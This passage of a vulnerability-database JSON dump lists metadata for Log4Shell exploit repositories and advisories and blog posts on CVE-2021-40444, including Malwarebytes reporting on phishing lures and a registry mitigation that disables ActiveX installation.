"8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:02", "description": "# Log4Shell\n\nCe projet est une d\u00e9monstration du fonctionnement d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T23:44:20", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-12T23:59:13", "id": "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:35:04", "description": "# cve-2021-44228-log4j-test\n\n\ud14c\uc2a4\ud2b8\n \n## **1. LDAP \uc11c\ubc84\uc640 \ud574\ud0b9 \ud30c\uc77c \ub2e4\uc6b4\ub85c\ub4dc ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T11:07:21", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T04:27:08", "id": "8021D807-3EDC-55A7-A9ED-A364159FADEE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:36:58", "description": "# CVE-2021-44228-docker-example\n\nA simple demonstration of CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T10:53:15", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T03:58:51", "id": "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:35:13", "description": "# log4j-pcap-activity\nA fun activity using a packet capture file...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T16:09:49", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-10-18T10:59:33", "id": "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:36:43", "description": "# Evaluate the Log4Shell: RCE 0-day Issue\n\nThis repo contains t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T02:26:56", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T03:53:41", "id": "F32DF396-0485-5F43-8A52-31B8DD252790", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:37:10", "description": "# CVE-2021-44228-log4Shell exploit\n\n## Exploit Test\n\n- runs ping...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T12:27:39", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-09-07T20:25:29", "id": "06D271D5-7A61-5692-9778-7F521D52F980", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:43:29", "description": "# Log4NoShell\nA Java Agent that disables Apache Log4J's JNDI Loo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T21:59:31", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-16T21:49:35", "id": "1097EF60-FC77-5135-B92B-4A84B46FABAF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:36:07", "description": "# Log4Shell Exploit Test\n\nThe goal of this project is to demonst...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T20:54:10", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T08:30:57", "id": "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:34", "description": "# XSYS-Log4J2Shell-Ex\n`CVE-2021-44228 (log4j2shell)` PoC as part...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-25T12:53:13", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T20:08:44", "id": "700E9EFF-DFA6-504F-8DD1-FB1A62E01721", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-27T08:28:06", "description": "# Log4Shell sample vulnerable application (CVE-2021-44228)\n\nThis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T06:29:06", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-27T06:30:44", "id": "FD364396-D660-5D23-8323-23248A5108C5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:37:15", "description": "# f5-waf-enforce-sigs-CVE-2021-44228\nThis enforces signatures fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T21:59:19", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-11T20:16:18", "id": "DA01F84A-9B1D-5337-A465-2A9AB088C056", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:55", "description": "A remote code execution vulnerability exists in Microsoft Internet Explorer MSHTML. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer MSHTML Remote Code Execution (CVE-2021-40444)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0554", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "trendmicroblog": [{"lastseen": "2021-09-29T14:37:27", "description": "Trend Micro detected a new campaign using a recent version of the known FormBook infostealer. Newer FormBook variants used the recent Office 365 zero-day vulnerability, CVE-2021-40444.", "cvss3": {}, "published": "2021-09-29T00:00:00", "type": "trendmicroblog", "title": "FormBook Adds Latest Office 365 0-Day Vulnerability (CVE-2021-40444) to Its Arsenal", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-29T00:00:00", "id": "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2", "href": "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-25T08:36:17", "description": "Microsoft has disclosed the existence of a new zero-day vulnerability that affects multiple versions of Windows. This vulnerability (designated as CVE-2021-40444) is currently delivered via malicious Office 365 documents and requires user input to open the file to trigger.", "cvss3": {}, "published": "2021-09-09T00:00:00", "type": "trendmicroblog", "title": "Remote Code Execution 0-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-09T00:00:00", "id": "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "href": "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Microsoft MSHTML contains a unspecified vulnerability which allows for remote code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft MSHTML Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-40444", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-09-25T08:35:08", "description": "Malwarebytes has reason to believe that the [MSHTML vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) listed under [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) is being used to target Russian entities. The Malwarebytes Intelligence team has intercepted email attachments that are specifically targeting Russian organizations.\n\nThe first template we found is designed to look like an internal communication within JSC GREC Makeyev. The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic holding of the country&#x27;s defense and industrial complex for both the rocket and space industry. It is also the lead developer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia&#x27;s largest research and development centers for developing rocket and space technology.\n\nThe email claims to come from the Human Resources (HR) department of the organization.\n\nA phishing email targeted at the Makeyev State Rocket Center, posing at its own HR department \n\nIt says that HR is performing a check of the personal data provided by employees. The email asks employees to please fill out the form and send it to HR, or reply to the mail. When the receiver wants to fill out the form they will have to enable editing. And that action is enough to trigger the exploit.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nThe second attachment we found claims to originate from the Ministry of the Interior in Moscow. This type of attachment can be used to target several interesting targets.\n\nA phishing email posing as the Russian Ministry of the Interior\n\nThe title of the documents translates to \u201cNotification of illegal activity.\u201d It asks the receiver to please fill out the form and return it to the Ministry of Internal affairs or reply to this email. It also urges the intended victim to do so within 7 days.\n\n### Russian targets\n\nIt is rare that we find evidence of cybercrimes against Russian targets. Given the targets, especially the first one, we suspect that there may be a state-sponsored actor behind these attacks, and we are trying to find out the origin of the attacks. We will keep you informed if we make any progress in that regard.\n\n### Patched vulnerability\n\nThe CVE-2021-40444 vulnerability may be old-school in nature (it involves ActiveX, remember that?) but it was only recently discovered. It wasn&#x27;t long before threat actors were sharing PoCs, tutorials and exploits on hacking forums, so that everyone was able to follow step-by-step instructions in order to launch their own attacks.\n\nMicrosoft quickly published mitigation instructions that disabled the installation of new ActiveX controls, and managed to squeeze a [patch into its recent Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) output, just a few weeks after the bug became public knowledge. However, the time it takes to create a patch is often dwarfed by the time it takes people to apply it. Organizations, especially large ones, are often found trailing far behind with applying patches, so we expect to see more attacks like this.\n\n\u0411\u0443\u0434\u044c\u0442\u0435 \u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0432\u0441\u0435!\n\nThe post [MSHTML attack targets Russian state rocket centre and interior ministry](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T19:16:56", "type": "malwarebytes", "title": "MSHTML attack targets Russian state rocket centre and interior ministry", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-22T19:16:56", "id": "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "href": "https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-13T12:35:29", "description": "Several researchers have independently reported a 0-day remote code execution vulnerability in MSHTML to Microsoft. The reason it was reported by several researchers probably lies in the fact that a limited number of attacks using this vulnerability have been identified, as per Microsoft\u2019s [security update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). \n\n> Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.\n\nMSHTML is a software component used to render web pages on Windows. Although it&#x27;s most commonly associated with Internet Explorer, it is also used in other software including versions of Skype, Microsoft Outlook, Visual Studio, and others.\n\nMalwarebytes, as shown lower in this article, blocks the related malicious powershell code execution.\n\n### CVE-2021-40444\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one has been assigned the designation [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>) and received a CVSS score of 8.8 out of 10. The CVSS standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.\n\nThe Cybersecurity and Infrastructure Security Agency took to Twitter to [encourage](<https://twitter.com/USCERT_gov/status/1435342618704191491>) users and organizations to review Microsoft&#x27;s mitigations and workarounds to address CVE-2021-40444.\n\n### ActiveX\n\nBecause MSHTML is the beating heart of Internet Explorer, the vulnerability also exists in that browser. Although given its limited use, there is little risk of infection by that vector. Microsoft Office applications however, use the MSHTML component to display web content in Office documents.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nSo, the attacker will have to trick the user into opening a malicious document. But we all know how good some attackers are at this.\n\n### Mitigation\n\nAt the moment all supported Windows versions are vulnerable. Since there is no patch available yet, Microsoft proposes a few methods to block these attacks.\n\n * Disable the installation of all ActiveX controls in Internet Explorer via the registry. Previously-installed ActiveX controls will still run, but no new ones will be added, including malicious ones.\n * Open documents from the Internet in Protected View or Application Guard for Office, both of which prevent the current attack. This is a default setting but it may have been changed.\n\nDespite the lack of a ready patch, all versions of Malwarebytes currently block this threat, as shown below. Malwarebytes also detects the eventual payload, Cobalt Strike, and has done so for years, meaning that even if a threat actor had disabled anti-exploit, then Cobalt Strike itself would still be detected. \n\n\n\nA screenshot from Malwarebytes Teams showing active detection of this threat\n\nA screenshot from Malwarebytes Nebula showing active detection of this threat\n\nA screenshot of Malwarebytes Teams blocking the final payload\n\nA screenshot of Malwarebytes Anti-Exploit blocking the exploit payload process\n\n### Registry changes\n\nModifying the registry may create unforeseen results, so create a backup before you change it! It may also come in handy when you want to undo the changes at a later point.\n\nTo create a backup, open Regedit and drill down to the key you want to back up (if it exists):\n\n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones`\n\nRight click the key in the left side of the registry pane and select &quot;Export&quot;. Follow the prompts and save the created reg file with a name and in a location where you can easily find it.\n\n\n\nTo make the recommended changes, open a text file and paste in the following script. Make sure that all of the code box content is pasted into the text file!\n \n \n Windows Registry Editor Version 5.00\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n\nSave the file with a .reg file extension. Right-click the file and select Merge. You&#x27;ll be prompted about adding the information to the registry, agree, and then reboot your machine.\n\n## Update september 9, 2021\n\nIt has taken researchers only a few days to circumvent the mitigations proposed by Microsoft. Once they were able to find a sample of a malicious Word document, they have started analyzing how it works and along the way poked holes in the defense strategies proposed by Microsoft.\n\nOne of the wobbly pillars is the Mark-of-the-Web (MoTW) flag that is given to downloaded files. This only blocks the exploit unless a user clicks on the &#x27;Enable Editing&#x27; buttons. Sadly, experience has learned us that it is not a good idea to trust that they won&#x27;t do that. Another problem with this flag is that it 